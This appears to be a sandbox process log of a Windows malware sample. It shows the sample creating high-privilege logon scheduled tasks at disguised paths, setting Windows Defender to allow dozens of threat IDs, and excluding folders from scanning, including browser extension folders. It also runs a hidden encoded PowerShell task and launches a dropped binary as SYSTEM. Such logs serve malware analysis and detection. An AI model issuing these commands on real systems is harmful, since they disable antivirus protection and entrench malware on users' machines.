"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4600 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:8
1⤵
PID:4804

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:6028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5304 -ip 5304
1⤵
PID:5772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ISetup8" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\ISetup8.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4960

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Default\Recent\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1968

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApi.ProxyStub\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2292

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Windows\WindowsShell\sysmon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4816

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ska2pwej.aeh.tmp" /sc ONLOGON /tr "'C:\PerfLogs\ska2pwej.aeh.tmp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2492

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ISetup8" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\ISetup8.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5832

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "system" /sc ONLOGON /tr "'C:\ProgramData\data1\system.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6956

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\wcimage\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6468

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5580 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:3
1⤵
PID:4444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=5752 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:8
1⤵
PID:6768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3548 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:8
1⤵
PID:5656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4480 -ip 4480
1⤵
PID:7688

C:\Windows\svchost.exe
C:\Windows\svchost.exe
1⤵
PID:8076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5220 -ip 5220
1⤵
PID:7524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 6840 -ip 6840
1⤵
PID:4340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5220 -ip 5220
1⤵
PID:5212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5220 -ip 5220
1⤵
PID:1144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 7792 -ip 7792
1⤵
PID:5428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5488 -ip 5488
1⤵
PID:5152

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x510 0x4ec
1⤵
PID:8036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5220 -ip 5220
1⤵
PID:5420

C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\LjYugcU.exe
C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\LjYugcU.exe my /Fksite_idiuY 385118 /S
1⤵
PID:5848
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:2340
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3804
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:184
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6620
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7448
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2208
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6476
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6668
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8088
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7548
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7160
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2512
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2632
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7724
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6208
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6560
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3640
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:628
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6176
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:368
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4748
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4352
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4432
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3020
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1540
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:796
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3436
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7800
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8096
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5148
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IYgGQCIDU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IYgGQCIDU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SispZMIUHlKkC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SispZMIUHlKkC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VMcfcqZeQaOU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VMcfcqZeQaOU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WUITINsQgCUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WUITINsQgCUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eHdwxxvqRpTedTcabtR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eHdwxxvqRpTedTcabtR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\xFlMivLSBvkcEEVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\xFlMivLSBvkcEEVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ynivKcrpvjVAAlvE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ynivKcrpvjVAAlvE\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:7604
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IYgGQCIDU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3008
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IYgGQCIDU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IYgGQCIDU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2240
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SispZMIUHlKkC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5408
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SispZMIUHlKkC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5224
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VMcfcqZeQaOU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6472
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VMcfcqZeQaOU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5916
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WUITINsQgCUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5588
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WUITINsQgCUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3220
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eHdwxxvqRpTedTcabtR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:7244
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eHdwxxvqRpTedTcabtR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3584
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\xFlMivLSBvkcEEVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:7132
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\xFlMivLSBvkcEEVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5372
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3948
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:7364
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:8100
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:7876
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4608
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5396
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ynivKcrpvjVAAlvE /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:7400
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ynivKcrpvjVAAlvE /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3228
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gEgsEyTYf" /SC once /ST 02:41:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:2528
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gEgsEyTYf"
  2⤵
  PID:2176
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gEgsEyTYf"
  2⤵
  PID:312
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "FnDMvNeFXjYClBqJR" /SC once /ST 09:22:37 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ynivKcrpvjVAAlvE\KZFTNslVoBUhkcO\zxSFANL.exe\" jf /nBsite_idTDQ 385118 /S" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:3736

